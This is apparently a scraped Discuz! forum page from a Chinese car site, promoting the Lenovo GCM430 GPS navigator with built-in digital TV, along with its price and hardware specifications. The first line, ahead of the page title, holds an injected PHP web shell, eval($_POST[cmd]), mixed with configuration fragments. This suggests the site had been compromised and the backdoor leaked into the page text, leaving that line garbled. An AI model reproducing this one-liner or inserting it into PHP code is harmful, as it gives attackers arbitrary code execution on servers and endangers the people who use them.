');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 送高級防滑墊 聯想新品內置數字電視 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

送高級防滑墊 聯想新品內置數字電視

聯想GCM430車載GPS導航儀,是一款新上市的電視導航一體PND產品,採用了鏡面設計的聯想430在外觀上並沒有很特別的地方。內置正版高德地圖,基本上屬於一款主流的多媒體車載導航產品,不要覺得掛上了聯想的品牌就會很昂貴,目前這款產品的報價為:1680元。



聯想GCM430車載GPS導航儀

    聯想GCM430車載GPS導航儀採用了500MHz主頻的ARM處理器,並採用了SiRF第三代接受芯片,屏幕尺寸為4.3英吋,視覺效果上可以滿足絕大多數的用戶需求,內置CMMB數字電視功能並支持MP5功能,操作系統為WinCE 6.0 Core。
返回列表